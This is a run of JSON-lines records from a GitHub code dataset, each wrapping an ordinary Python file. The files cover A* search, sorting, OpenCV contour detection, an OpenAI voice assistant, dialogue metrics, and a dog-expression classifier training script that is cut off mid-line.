# output *= float(math.sqrt(self.num_features)) # skip and externally handle.\n\n return output\n\n def extra_repr(self) -> str:\n s = f\"{self.num_classes}, {self.num_features}, cutoffs={self.cutoffs[:-1]}, div_value={self.div_value}\"\n if self.padding_idx is not None:\n s += f\", padding_idx={self.padding_idx}\"\n if self.use_shortlist_proj:\n s += f\", shortlist_proj=True\"\n return s\n","repo_name":"aiha-lab/Attention-Head-Pruning","sub_path":"nnlib/nn/intrinsic/adaptive.py","file_name":"adaptive.py","file_ext":"py","file_size_in_byte":12960,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"69995024721","text":"from dictionaries import neighbours_dictionary, heuristic_disctionary, path_cost_dictionary\n\nstart_node = 'Arad'\ngoal_node = \"Bucharest\"\n\n\ndef a_star():\n # initialize priority queue with start_node in it\n priority_queue = PriorityQueue()\n goal_found = False\n # list of all visited nodes\n visited_nodes = []\n\n while priority_queue or not goal_found:\n current_node = priority_queue[0]\n visited_nodes.append(current_node)\n if current_node.city == goal_node:\n break\n priority_queue.remove(current_node)\n\n neighbours = neighbours_dictionary[current_node.city]\n # check if the node is an end node i.e. All neighbours are visited or no neighbour\n for neighbour in neighbours:\n # convert dictionary data to string for generic purpose\n neighbour = str(neighbour)\n if neighbour not in visited_nodes:\n # total path travelled from start node to current node + current node to neighbour node\n neighbour_GofN = current_node.GofN + int(path_cost_dictionary[current_node.city][neighbour])\n neighbour_node = Node(city=neighbour, GofN=neighbour_GofN, parent=current_node.city)\n priority_queue.priority_insert(neighbour_node)\n\n if priority_queue:\n print('GOAL NODE FOUND')\n print(\"VISITED NODES\")\n for x in visited_nodes:\n print(x.city, end=' ')\n\n # calculating optimal path from visited nodes\n print(\"OPTIMAL PATH\")\n optimal_path = [start_node]\n parent = start_node\n for child_node in visited_nodes:\n if child_node.parent == parent:\n optimal_path.append(child_node.city)\n parent = child_node.city\n print(optimal_path)\n\n\n else:\n print(\"goal node not found\")\n\n\nclass PriorityQueue(list):\n def __init__(self):\n first_node = node = Node(city=start_node, GofN=0, parent='NO PARENT')\n self.priority_insert(first_node)\n\n def priority_insert(self, node):\n i = 0\n for i in range(0, len(self)):\n if self[i].FofN > node.FofN:\n break\n self.insert(i, node)\n\n\nclass Node:\n def __init__(self, city, parent, GofN):\n # name of node\n self.city = city\n # name of parent node\n self.parent = parent\n # G(N) Path Cost Covered From Start Node to Current Node\n self.GofN = GofN\n # H(N) Heuristic Cost from Goal Node\n self.HofN = int(heuristic_disctionary[goal_node][self.city])\n # F(N) = G(N) + H(N)\n self.FofN = self.GofN + self.HofN\n","repo_name":"M-Talha517/AI_Searching_Algorithms","sub_path":"A_Star.py","file_name":"A_Star.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3509213171","text":"\"\"\"test_moose_attribs.py: \n\n\"\"\"\n \n__author__ = \"Dilawar Singh\"\n__copyright__ = \"Copyright 2017-, Dilawar Singh\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Dilawar Singh\"\n__email__ = \"dilawars@ncbs.res.in\"\n__status__ = \"Development\"\n\nimport sys\nimport os\nimport moose\n\nattribs = ['AdExIF', 'AdThreshIF', 'Adaptor', 'Annotator', 'Arith', 'BufPool',\n 'CaConc', 'CaConcBase', 'ChanBase', 'ChemCompt', 'Cinfo', 'Clock',\n 'Compartment', 'CompartmentBase', 'ConcChan', 'CplxEnzBase', 'CubeMesh',\n 'CylMesh', 'DestField', 'DiagonalMsg', 'DifBuffer', 'DifBufferBase',\n 'DifShell', 'DifShellBase', 'DiffAmp', 'Dsolve', 'ElementField',\n 'EndoMesh', 'Enz', 'EnzBase', 'ExIF', 'Finfo', 'Function',\n 'GapJunction', 'GraupnerBrunel2012CaPlasticitySynHandler', 'Group',\n 'Gsolve', 'HHChannel', 'HHChannel2D', 'HHChannelBase', 'HHGate',\n 'HHGate2D', 'HSolve', 'INFINITE', 'IntFire', 'IntFireBase', 'Interpol',\n 'Interpol2D', 'IzhIF', 'IzhikevichNrn', 'Ksolve', 'LIF', 'Leakage',\n 'LookupField', 'MMPump', 'MMenz', 'MarkovChannel' ,\n # 'MarkovGslSolver', # This is GSL specific.\n 'MarkovRateTable', 'MarkovSolver', 'MarkovSolverBase', 'MeshEntry',\n 'MgBlock', 'Msg', 'Mstring', 'NMDAChan', 'Nernst', 'NeuroMesh',\n 'Neuron', 'Neutral', 'OneToAllMsg', 'OneToOneDataIndexMsg',\n 'OneToOneMsg', 'PIDController', 'Pool', 'PoolBase',\n 'PostMaster', 'PsdMesh', 'PulseGen', 'PyRun', 'QIF', 'RC', 'RandSpike',\n 'Reac', 'ReacBase', 'SBML', 'STDPSynHandler', 'STDPSynapse',\n 'SeqSynHandler', 'Shell', 'SimpleSynHandler', 'SingleMsg', 'SparseMsg',\n 'Species', 'SpikeGen', 'SpikeStats', 'Spine', 'SpineMesh', 'Stats',\n 'SteadyState', 'StimulusTable', 'Stoich', 'Streamer', 'StringIO',\n 'SymCompartment', 'SynChan', 'SynHandlerBase', 'Synapse', 'Table',\n 'Table2', 'TableBase', 'TimeTable', 'VClamp', 'VERSION', 'Variable',\n 'VectorTable', 'ZombieBufPool', 'ZombieCaConc', 'ZombieCompartment',\n 'ZombieEnz', 'ZombieFunction', 'ZombieHHChannel', 'ZombieMMenz',\n 'ZombiePool', 'ZombieReac', '_moose', \n 'append_finfodocs', 'ce', 'chemMerge',\n 'chemUtil', 'closing', 'connect', 'copy', 'delete', 'division', 'doc',\n 'element', 'exists', 'finfotypes', 'fixXreacs', 'genesis', 'getCwe',\n 'getField', 'getFieldDict', 'getFieldNames', 'getfielddoc',\n 'getmoosedoc', 'isRunning', \n 'known_types', 'le', 'listmsg', 'loadModelInternal', 'melement',\n 'mergeChemModel', 'moose',\n 'mooseAddChemSolver', 'mooseDeleteChemSolver', 'mooseReadNML2',\n 'mooseReadSBML', 'mooseWriteKkit', 'mooseWriteNML2', 'mooseWriteSBML',\n 'moose_constants', 'moose_test', 'move',\n 'nml2Import_', 'pager', 'print_utils',\n 'pwe', 'pydoc', 'rand', 'reinit', \n 'seed', 'sequence_types', 'setClock', 'setCwe', 'showfield',\n 'showfields', 'showmsg', 'start', 'stop', 'syncDataHandler',\n 'test', 'testSched', 'toUnicode', 'useClock', 'utils', 'vec', 'version',\n 'warnings', 'wildcardFind']\n\ndef main():\n global attribs\n for at in attribs:\n assert hasattr( moose, at ), 'Attrib %s not found' % at \n print( getattr(moose, at ) )\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"BhallaLab/moose","sub_path":"moose-core/tests/python/test_moose_attribs.py","file_name":"test_moose_attribs.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"24095444306","text":"from gig import ents\nfrom utils import dt\n\n\ndef get_label(old_label, region_ids):\n if len(region_ids) > 5:\n return old_label\n\n # plural = ''\n # if len(region_ids) == 2:\n # plural = 's'\n\n region_ents = list(\n map(\n lambda region_id: ents.get_entity(region_id),\n region_ids,\n )\n )\n # label_entity_type = ent_types.get_entity_type(region_ents[0]['id'])\n return dt.to_kebab(\n # label_entity_type\n # + plural\n # + ' - '\n ' '.join(\n list(\n map(\n lambda ent: ent['name'],\n region_ents,\n )\n )\n )\n )\n","repo_name":"nuuuwan/sl_new_pds","sub_path":"src/sl_new_pds/region_utils.py","file_name":"region_utils.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32246370192","text":"\nfrom typing import List, Any\n\n\ndef selection_sort(nos: List[Any], N: int):\n \"\"\"\n This function takes a list and sorts them in ascending order\n\n The selection sort algorithm sorts an array by repeatedly finding \n the minimum element (considering ascending order) from unsorted part \n and putting it at the beginning.\n\n Selection sort is better than bubble sort as it requires less \n no of swappings and spends time in finding minimum element\n\n https://www.personal.kent.edu/~rmuhamma/Algorithms/MyAlgorithms/Sorting/selectionSort.htm\n\n param:\n nos: array of chars or ints or floats\n\n return: None\n\n complexity:\n worst: o(n*n)\n avg: o(n*n)\n best: o(n)\n \"\"\"\n for i in range(N):\n min_idx = i\n\n for j in range(i+1, N):\n if nos[j] < nos[min_idx]:\n min_idx = j\n\n nos[i], nos[min_idx] = nos[min_idx], nos[i]\n\n\nif __name__ == \"__main__\":\n arr = list('premkumar')\n selection_sort(arr, len(arr))\n print(arr)\n","repo_name":"premchalmeti/DSA_101","sub_path":"algo/sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34339728189","text":"from threading import Thread\nimport time\n\n\ndef carro(velocidade, piloto):\n trajeto = 0\n while trajeto <= 100:\n trajeto+=velocidade\n time.sleep(0.5)\n print('Piloto: {} KM: {} \\n'.format(piloto, trajeto))\n\n\n# def carro2(velocidade):\n# trajeto = 0\n# while trajeto <= 100:\n# print('carro2: ', trajeto)\n# trajeto+=velocidade\n\n# carro1(10)\n# carro2(20)\n\nt_carro1 = Thread(target=carro, args=[1, 'Rodrigo'])\nt_carro2 = Thread(target=carro, args=[1.5, 'Rodriguinho'])\nt_carro1.start()\nt_carro2.start()\n\n\n","repo_name":"jrrodrigo421/scriptsSegurancaDaInformacao","sub_path":"ferramentas_Python/threads_E_ip/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29235622663","text":"import time\nimport statistics\nimport matplotlib.pyplot as plt\n\narchivo = \"data_encoders.txt\"\n\nif __name__==\"__main__\":\n\n a = 0 #Variable para detectar la cantidad de reinicios\n\n #Contadores para hallar cuántos reinicios se registran en cada rueda\n contador1 = 0\n contador2 = 0\n contador3 = 0\n contador4 = 0\n contador5 = 0\n contador6 = 0\n\n t1 = time.perf_counter() \n f = open(archivo,'r')\n contenido = f.read()\n f.close()\n t2 = time.perf_counter() \n \n tiempo_lectura = t2 - t1\n\n print(f\"El tiempo para leer el archivo fue de: {tiempo_lectura} msec\")\n print(\"-----------------------------------------------------------------\")\n\n datos = contenido.split(\"\\n\")\n \n #Rueda 1:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[0]) - int(valor_1[0]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador1 = contador1 + 1\n a = a + 1\n \n #Rueda 2:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[1]) - int(valor_1[1]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador2 = contador2 + 1\n a = a + 1 \n \n #Rueda 3:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[2]) - int(valor_1[2]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador3 = contador3 + 1\n a = a + 1 \n\n #Rueda 4:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[3]) - int(valor_1[3]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador4 = contador4 + 1\n a = a + 1 \n\n #Rueda 5:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[4]) - int(valor_1[4]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador5 = contador5 + 1\n a = a + 1 \n\n #Rueda 6:\n for i in range(31920):\n valor_1 = datos[i+1+a].split(\",\")\n valor_2 = datos[i+2+a].split(\",\")\n a = 0\n\n diferencia = (int(valor_2[5]) - int(valor_1[5]))\n \n if (abs(diferencia) > 2500): #Valor referencial para determinar el numero de reinicios\n\n contador6 = contador6 + 1\n a = a + 1 \n\n print(f\"El encoder de la rueda 1 ha presentado: {contador1} reinicios\") \n print(f\"El encoder de la rueda 2 ha presentado: {contador2} reinicios\") \n print(f\"El encoder de la rueda 3 ha presentado: {contador3} reinicios\") \n print(f\"El encoder de la rueda 4 ha presentado: {contador4} reinicios\")\n print(f\"El encoder de la rueda 5 ha presentado: {contador5} reinicios\")\n print(f\"El encoder de la rueda 6 ha presentado: {contador6} reinicios\")\n print(\"-----------------------------------------------------------------\")\n \n t3 = time.perf_counter() \n b = open(\"data_encoders.csv\",'w')\n lineas = b.write(contenido)\n f.close()\n t4 = time.perf_counter() \n \n tiempo_escritura = t4 - t3\n\n print(f\"El tiempo para escribir el archivo fue de: {tiempo_escritura} msec\")\n\n ","repo_name":"leleletus/arquitectura_x86_64","sub_path":"extras/modelosla/Lab7/Pregunta2.py","file_name":"Pregunta2.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32795447607","text":"from sklearn.preprocessing import LabelEncoder\nimport bisect\nimport logging\nimport numpy as np\n\n\nclass LabelEncoderRobust(LabelEncoder):\n def __init__(self):\n self.class_type = None\n\n def fit(self, y):\n super().fit(y)\n le_classes = self.classes_.tolist()\n logging.debug(\"LER classes: {}\".format(le_classes))\n if len(le_classes) > 0:\n self.class_type = type(le_classes[0])\n logging.debug(\"LER classes type: {}\".format(self.class_type))\n if self.class_type == str:\n bisect.insort_left(le_classes, 'UNKNOWN_LBL')\n if self.class_type == int:\n bisect.insort_left(le_classes, -999)\n self.classes_ = np.array(le_classes)\n\n def transform(self, y):\n for i in range(len(y)):\n item = y[i]\n if item not in self.classes_:\n logging.debug(\"transform LER classes type: {}\".format(self.class_type))\n if self.class_type == str:\n y[i] = 'UNKNOWN_LBL'\n elif self.class_type == int:\n y[i] = -999\n else:\n print(self.class_type)\n print(item)\n raise ValueError(\"list_type in None, cannot transform\")\n return super().transform(y)","repo_name":"abmohajeri/holodetect","sub_path":"utils/robust_label_encoder.py","file_name":"robust_label_encoder.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19766682852","text":"\r\n# Exercise 05: Preparing Image for edge detection\r\n\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\ndef nothing(x):\r\n pass\r\n\r\npath =\"C:\\\\Users\\\\hp\\\\Google Drive\\\\Fiverr Work\\\\2022\\\\15. Teaching OpenCV to Client\\\\Pics+scripts\\\\Pictures\"\r\n\r\ncv.namedWindow(\"image\")\r\n\r\ncv.createTrackbar(\"lower\", \"image\", 0, 255, nothing)\r\ncv.createTrackbar(\"upper\", \"image\", 0, 255, nothing)\r\n\r\n# img = cv.imread(path + \"\\\\piece05.png\")\r\n# imgResized = cv.resize(img, (200, 300))\r\nimg = cv.VideoCapture(0)\r\n\r\nkernel = np.ones((5,5), \"uint8\")\r\nwhile True:\r\n\r\n lo = cv.getTrackbarPos(\"lower\", \"image\")\r\n upper = cv.getTrackbarPos(\"upper\", \"image\")\r\n\r\n success, frame = img.read()\r\n\r\n imgGray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n blurImg = cv.GaussianBlur(imgGray, (5,5), 0)\r\n cannyImge = cv.Canny(blurImg, lo, upper)\r\n imgDilation = cv.dilate(cannyImge, kernel, iterations=1)\r\n contours, hierarchy = cv.findContours(imgDilation, \r\n cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\r\n\r\n print(len(contours))\r\n\r\n cv.drawContours(frame, contours, -1, (0, 255, 0), 3)\r\n\r\n # result = np.hstack((imgGray, blurImg, cannyImge, imgDilation))\r\n\r\n # cv.imshow(\"image\", imgResized)\r\n cv.imshow(\"image\", frame)\r\n\r\n k = cv.waitKey(1)\r\n\r\n if k == ord(\"q\"):\r\n break\r\n\r\ncv.destroyAllWindows()","repo_name":"ZiaUrRehman-bit/Object-Detection-from-Webcam-Using-OpenCV","sub_path":"CustomObectDetectionWEBCAM.py","file_name":"CustomObectDetectionWEBCAM.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30680260420","text":"import time\r\n\r\nprint (\"Would you like a timer, or a countdown?\")\r\n\r\ntimerOrCountdown = input()\r\nTORC = timerOrCountdown.lower()\r\n\r\n\r\ndef countdown(t):\r\n\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:02d}:{:02d}'.format(mins, secs)\r\n print(t)\r\n time.sleep(1)\r\n t -= 1\r\n\r\n\r\nif TORC == \"countdown\":\r\n\r\n print(\"Please enter the length in seconds of the desired countdown:\")\r\n countdownLength = input()\r\n countdown(int(countdownLength))\r\n\r\nelse:\r\n\r\n print(\"Welcome to the timer function.\")\r\n input(\"Press enter to start: \")\r\n start_time = time.time()\r\n\r\n input(\"Press enter to stop: \")\r\n end_time = time.time()\r\n\r\n time_lapsed = end_time - start_time\r\n print(str(time_lapsed) + \" seconds\")\r\n\r\n\r\n\r\n\r\n","repo_name":"GithubNathan/TimerAndStopwatch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40224789139","text":"import speech_recognition as sr\r\nimport pyttsx3\r\nimport openai\r\n\r\nopenai.api_key = \"Your API Key\"\r\n\r\nengine = pyttsx3.init()\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice', voices[1].id)\r\n\r\nr = sr.Recognizer()\r\nmic = sr.Microphone(device_index=1)\r\n\r\nconversation = []\r\nuser_name = \"Sam\"\r\nbot_name = \"Siri\"\r\n\r\ndef listen_for_audio():\r\n with mic as source:\r\n print(\"\\nListening...\")\r\n r.adjust_for_ambient_noise(source, duration=0.2)\r\n audio = r.listen(source)\r\n print(\"No longer listening\")\r\n\r\n try:\r\n user_input = r.recognize_google(audio)\r\n return user_input\r\n except sr.UnknownValueError:\r\n return \"\"\r\n\r\ndef generate_response(prompt):\r\n response = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=prompt,\r\n temperature=0.7,\r\n max_tokens=256,\r\n top_p=1,\r\n frequency_penalty=0,\r\n presence_penalty=0\r\n )\r\n\r\n response_str = response.choices[0].text.strip().replace(\"\\n\", \"\")\r\n return response_str\r\n\r\nwhile True:\r\n user_input = listen_for_audio()\r\n if user_input:\r\n prompt = user_name + \": \" + user_input + \"\\n\" + bot_name + \":\"\r\n conversation.append(prompt)\r\n\r\n response_str = generate_response(\"\\n\".join(conversation))\r\n conversation.append(response_str + \"\\n\")\r\n print(response_str)\r\n\r\n engine.say(response_str)\r\n engine.runAndWait()\r\n","repo_name":"Nihalrt/Chat-assistant","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38026236072","text":"import abc\nfrom typing import Optional, Union\n\nimport numpy as np\n\nfrom my_enums import ZsTodConstants\nfrom torchmetrics import Metric\nimport utils\n\n\nclass TodMetricsBase(Metric):\n \"\"\"Base class for all TOD metrics.\"\"\"\n\n full_state_update = False\n\n def __init__(\n self,\n score: bool = 0.0,\n is_cached=False,\n ):\n super().__init__()\n self.score = score\n self.is_cached = is_cached\n self.wrong_preds = {}\n\n def _add_wrong_pred(self, key: any):\n if type(key) not in [int, str]:\n key = str(key)\n self.wrong_preds[key] = self.wrong_preds.get(key, 0) + 1\n\n def _extract_section_from_text(\n self,\n text: Union[str, list[str]],\n start_token: str,\n end_token: str,\n default_value: any = None,\n multiple_values: bool = False,\n trim_spaces: bool = False,\n ):\n text = utils.get_text_in_between(\n text, start_token, end_token, default_value, multiple_values=multiple_values\n )\n if not trim_spaces:\n return text\n if isinstance(text, list):\n return [t.strip() for t in text]\n return text.strip()\n\n def _extract_section_and_split_items_from_text(\n self,\n text: str,\n start_token: str,\n end_token: str,\n separator: str = ZsTodConstants.ITEM_SEPARATOR,\n default_value: any = [],\n multiple_values: bool = False,\n trim_spaces: bool = False,\n ) -> np.ndarray:\n section_txts = self._extract_section_from_text(\n text,\n start_token,\n end_token,\n default_value,\n multiple_values=multiple_values,\n trim_spaces=trim_spaces,\n )\n if not section_txts:\n return default_value\n if type(section_txts) == list:\n out = [st.split(separator) for st in section_txts]\n return np.concatenate(out, axis=0, dtype=str)\n return np.array(section_txts.split(separator), dtype=str)\n\n def update(self, predictions: list[str], references: list[str]) -> None:\n if not len(predictions):\n raise ValueError(\"You must provide at least one prediction.\")\n if not len(references):\n raise ValueError(\"You must provide at least one reference.\")\n if not len(predictions) == len(references):\n raise ValueError(\n f\"Predictions {len(predictions)} and references {len(references)} must have the same length\"\n )\n self.is_cached = False\n return self._update(predictions, references)\n\n @abc.abstractmethod\n def _update(self, predictions: list[str], references: list[str]) -> None:\n pass\n\n def compute(self) -> float:\n if self.is_cached:\n return self.score\n self.score = self._compute()\n self.is_cached = True\n return self.score\n\n @abc.abstractmethod\n def _compute(self) -> float:\n pass\n\n\nclass MetricCollection:\n \"\"\"Collects multiple metrics.\n Args:\n metrics: A dictionary of metrics.\n Example Usage:\n metrics = MetricCollection(\n {\n \"goal_accuracy\": GoalAccuracyMetric(),\n \"intent_accuracy\": IntentAccuracyMetric(),\n \"requested_slots\": RequestedSlotsMetric(),\n }\n )\n references = # list of whole target str\n predictions = # list of whole prediction str\n metrics.add_batch(predictions, references)\n \"\"\"\n\n def __init__(self, metrics: dict[str, TodMetricsBase] = None):\n if metrics is None:\n raise ValueError(\"No metrics provided to MetricCollection\")\n self.metrics = metrics\n\n def add_batch(self, predictions: list[str], references: list[str]) -> None:\n for m in self.metrics.values():\n m.update(predictions, references)\n\n def compute(self) -> float:\n return [m.compute() for m in self.metrics.values()]\n\n def __str__(self):\n return \"\\n\".join([str(m) for m in self.metrics.values()])\n","repo_name":"MultifacetedNLP/ZS-ToD","sub_path":"zs_tod/src/metrics/tod_metrics_base.py","file_name":"tod_metrics_base.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17871932858","text":"import gym\n\nenv = gym.make(\"FrozenLake-v0\", is_slippery=True)\nenv.reset()\nenv.render()\n\nprint(\"Action space: \", env.action_space)\nprint(\"Observation space: \", env.observation_space)\n\nMAX_ITERATIONS = 10\nfor i in range(MAX_ITERATIONS):\n random_action = env.action_space.sample()\n new_state, reward, done, info = env.step(random_action)\n env.render()\n if done:\n break","repo_name":"shazi129/py_workspace","sub_path":"gym/test_env.py","file_name":"test_env.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28837188094","text":"import math\nimport os\nimport numpy as np\nimport torch\nimport logging\nimport pandas as pd\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom torch.utils.data import DataLoader, random_split\nfrom torchvision import transforms\nfrom tqdm import tqdm\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import f1_score, roc_auc_score, accuracy_score\nfrom sklearn.preprocessing import label_binarize\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport util\nfrom model.VitPatch16 import VIT_patch16\nfrom model.VitPatch32 import VIT_patch32\nfrom model.ResNet34 import ResNet_34\nfrom model.ResNet50 import ResNet_50\nfrom model.ResVit import ResVit\nfrom augmentation import augment\nfrom args import get_train_args\nfrom util import str2bool\n\n\ndef get_logger(logger_name, log_file, level=logging.INFO):\n logger = logging.getLogger(logger_name)\n fileHandler = logging.FileHandler(log_file, mode='a')\n\n logger.setLevel(level)\n logger.addHandler(fileHandler)\n\n return logger\n\n\ndef split_dataset(root_dir, csv_file='labels.csv', train_size=0.8, valid_size=0.1):\n train_dir = \"/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/train_df.csv\"\n valid_dir = \"/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/valid_df.csv\"\n test_dir = \"/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/test_df.csv\"\n if not os.path.exists(train_dir) and \\\n not os.path.exists(valid_dir) and \\\n not os.path.exists(test_dir):\n # Load labels from CSV\n df = pd.read_csv(os.path.join(root_dir, csv_file))\n\n # Encode labels to numerical data,\n # 0 for \"happy\", 1 for \"sad\", 2 for \"angry\", 3 for \"relaxed\"\n label_encoder = LabelEncoder()\n df['label'] = label_encoder.fit_transform(df['label'])\n\n # Split into train and temp (test + validation)\n train_data, temp_data = train_test_split(df, train_size=train_size, random_state=100, shuffle=True,\n stratify=df['label'])\n\n # Determine the test size such that the remaining data will be used for validation\n test_size = 1.0 - (valid_size / (1.0 - train_size))\n\n # Split temp_data into validation and test\n valid_data, test_data = train_test_split(temp_data, test_size=test_size, random_state=100, shuffle=True,\n stratify=temp_data['label'])\n print(\"Data set is split into: \\n Training: \", train_data.shape[0],\n \"\\n Validation: \", valid_data.shape[0],\n \"\\n Test: \", test_data.shape[0])\n train_data.to_csv(train_dir, index=False)\n valid_data.to_csv(valid_dir, index=False)\n test_data.to_csv(test_dir, index=False)\n else:\n train_data = pd.read_csv(train_dir)\n valid_data = pd.read_csv(valid_dir)\n test_data = pd.read_csv(test_dir)\n\n return train_data, valid_data, test_data\n\n\nclass SupervisedContrastiveLoss(nn.Module):\n def __init__(self, device, temperature=0.1, scale_by_temperature=True):\n super(SupervisedContrastiveLoss, self).__init__()\n self.device = device\n self.temperature = temperature\n self.scale_by_temperature = scale_by_temperature\n\n def forward(self, features, labels=None):\n \"\"\"\n input:\n features: input embeddings [batch_size, hidden_dim]\n labels: label of all samples [batch_size].\n mask: mask for learning [batch_size, batch_size], if sample i and j have the same label,then mask_{i,j}=1,\n 0 otherwise\n output:\n loss value\n \"\"\"\n features = F.normalize(features, p=2, dim=1)\n batch_size = features.shape[0]\n\n if labels is not None:\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(self.device)\n else:\n raise ValueError('Label is required to compute contrastive loss')\n\n # compute logits\n # similarity of samples i j\n anchor_dot_contrast = torch.div(torch.matmul(features, features.T), self.temperature)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n exp_logits = torch.exp(logits)\n\n # mask\n logits_mask = torch.ones_like(mask) - torch.eye(batch_size, device=mask.device)\n positives_mask = mask * logits_mask\n negatives_mask = 1. - mask\n\n num_positives_per_row = torch.sum(positives_mask, axis=1) # beside itself, num of positives [2 0 2 2]\n denominator = torch.sum(\n exp_logits * negatives_mask, axis=1, keepdims=True) + torch.sum(\n exp_logits * positives_mask, axis=1, keepdims=True)\n\n log_probs = logits - torch.log(denominator)\n if torch.any(torch.isnan(log_probs)):\n raise ValueError(\"Log_prob has nan!\")\n\n log_probs = torch.sum(\n log_probs * positives_mask, axis=1)[num_positives_per_row > 0] / num_positives_per_row[\n num_positives_per_row > 0]\n\n # loss\n loss = -log_probs\n if self.scale_by_temperature:\n loss *= self.temperature\n loss = loss.mean()\n return loss\n\n\nclass HybridLoss(nn.Module):\n def __init__(self, device, args, temperature=0.1, alpha=0.5):\n super(HybridLoss, self).__init__()\n self.cross_entropy_loss = nn.CrossEntropyLoss()\n self.contrastive_loss = SupervisedContrastiveLoss(device, temperature)\n self.alpha = alpha\n self.args = args\n\n def forward(self, output, embeddings, labels):\n if self.args.loss_name == \"Hybrid_loss\":\n cross_entropy_loss = self.cross_entropy_loss(output, labels)\n contrastive_loss = self.contrastive_loss(embeddings, labels)\n return self.alpha * cross_entropy_loss + (1 - self.alpha) * contrastive_loss\n else:\n cross_entropy_loss = self.cross_entropy_loss(output, labels)\n return cross_entropy_loss\n\n\nclass DogExpressionDataset(torch.utils.data.Dataset):\n def __init__(self, args, root_dir, df, dataset, transform=None):\n if not str2bool(args.augment):\n self.root_dir = root_dir\n self.transform = transform\n self.image_files = [os.path.join(self.root_dir, x) for x in df['filename']]\n self.image_labels = [x for x in df['label']]\n else:\n if dataset == \"Train\" or dataset == \"Validate\":\n self.root_dir = '/content/gdrive/MyDrive/Dissertation/dataset/Dog Emotion/images_augment'\n self.transform = transform\n self.image_files = [os.path.join(self.root_dir, x) for x in df['filename']]\n self.image_labels = [x for x in df['label']]\n else:\n self.root_dir = root_dir\n self.transform = transform\n self.image_files = [os.path.join(self.root_dir, x) for x in df['filename']]\n self.image_labels = [x for x in df['label']]\n\n def __len__(self):\n return len(self.image_files)\n\n def __getitem__(self, idx):\n image = Image.open(self.image_files[idx])\n label = self.image_labels[idx]\n if self.transform:\n image = self.transform(image)\n return image, torch.tensor(label, dtype=torch.long)\n\n\ndef train(device, epoch_num, logger, writer, dataloader, model, loss_fn, optimizer):\n model.train()\n batch = 0\n avgloss = 0\n with tqdm(dataloader, unit=\"batch\") as tqdm_epoch:\n for X, y in tqdm_epoch:\n\n tqdm_epoch.set_description(f\"Epoch:\")\n # print(X)\n X, y = X.to(device), y.to(device)\n embeddings, logits = model(device, X)\n loss = 